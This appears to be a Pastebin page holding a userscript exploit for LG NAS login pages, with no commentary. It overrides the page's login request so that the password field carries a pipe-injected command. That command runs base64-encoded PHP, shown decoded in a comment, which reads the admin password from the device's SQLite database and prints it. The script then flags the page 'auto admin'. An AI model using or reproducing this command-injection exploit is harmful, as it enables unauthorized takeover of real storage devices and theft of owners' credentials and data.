Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // ==UserScript==
- // @name test-lg-nas
- // @namespace pac1250@gmail.com
- // @author pac1250@gmail.com
- // @version 1.2.1
- // @match http://*/*/login/login.php
- // @include http://*/*/login/login.php
- // ==/UserScript==
- function main () {
- $(document).ready(function() {
- /* Base64 encoded PHP :
- $dbh=new PDO('sqlite:/etc/nas/db/share.db');
- $sth=$dbh->prepare('select passwd from user where uid=\'admin\'');
- $sth->execute();
- $DB_user_info=$sth->fetchAll();
- $dbh=null;
- echo $DB_user_info[0][0];
- */
- var php = "JGRiaD1uZXcgUERPKCdzcWxpdGU6L2V0Yy9uYXMvZGIvc2hhcmUuZGInKTsNCiRzdGg9JGRiaC0+cHJlcGFyZSgnc2VsZWN0IHBhc3N3ZCBmcm9tIHVzZXIgd2hlcmUgdWlkPVwnYWRtaW5cJycpOw0KJHN0aC0+ZXhlY3V0ZSgpOw0KJERCX3VzZXJfaW5mbz0kc3RoLT5mZXRjaEFsbCgpOw0KJGRiaD1udWxsOw0KZWNobyAkREJfdXNlcl9pbmZvWzBdWzBdOw==";
- var magic = "xxxxx | echo \"<?php eval(base64_decode(\\\"" + php + "\\\")); ?>\"|/usr/bin/php-cgi -q";
- // overrive LG sendRequest method
- sendRequest = function(callback,data,method,url,async,sload,p_num,user,password)
- {
- $.ajax({
- type: "POST",
- url: url,
- data: {
- id: "admin",
- mobile: "false",
- op_mode: "login",
- password: magic
- },
- success: function(data) { callback({responseText: data}); },
- dataType: "text"
- });
- }
- // show that hack has been installed
- $("body").before("<div style=\"background-color: #FFEEEE; border: 1px solid #000000; font-family: Verdana; padding: 1px 11px; position: fixed; right: 10px; text-decoration: blink; top: 10px;\">auto admin</div>");
- });
- }
- var script = document.createElement('script');
- script.appendChild(document.createTextNode('('+ main +')();'));
- (document.body || document.head || document.documentElement).appendChild(script);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement